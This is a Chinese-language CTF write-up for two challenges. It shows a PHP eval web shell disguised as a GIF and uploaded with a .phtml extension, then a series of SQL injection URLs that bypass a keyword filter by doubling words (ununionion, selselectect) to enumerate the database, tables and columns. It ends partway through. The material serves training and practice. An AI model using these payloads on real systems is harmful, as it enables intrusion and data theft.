13.upload1 文件上传漏洞（上传图片）

按照传统方法，新建文件（xinjian）写一句话木马，利用Windows文件后缀识别的特点，将后缀名改为图片后缀名(xinjian.jpg)，上传文件，抓包改包。

GIF89a
<script language="php">@eval($_POST['shell']);</script>

修改filename（改为phtml后缀）和Content-Type（改为如图）

上传成功后显示文件路径

构架url用蚁剑连接

打开flag

14.BabySQL （注入）

尝试注入：/check.php?username=admin&password=admin

出现错误信息，再试试万能钥匙

你有一个错误在你的SQL语法；检查与您的MariaDB服务器版本对应的手册，以便在第1行'1=1#'和password='1''附近使用正确的语法。

发现or被过滤了，试试双写 将or换为oorr

双写可以绕过，后面遇到同样被过滤的词，直接双写就OK了。

①查看字段数

/check.php?username=1'oorrder bbyy 1%23&password=1'
/check.php?username=1'oorrder bbyy 2%23&password=1'
/check.php?username=1'oorrder bbyy 3%23&password=1'
/check.php?username=1'oorrder bbyy 4%23&password=1'

字段为1，2，3的时候页面显示为

字段为4报错

②联合查询1，2，3字段

/check.php?username=1'ununionion selselectect 1,2,3%23&password=1'
需要双写union和select

可以在页面上返回信息的是2，3字段。

③爆破当前的库、用户

/check.php?username=1'ununionion selselectect 1,user(),database()%23&password=1'
需要双写union和select

④爆破表

/check.php?username=1'ununionion selselectect 1,2,group_concat(table_name)frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=1'
需要双写union、select、from、or、where

⑤爆破b4bsql表

/check.php?username=1'ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd
table_name='b4bsql'%23&password=1'
双写union、select、from、or、where、and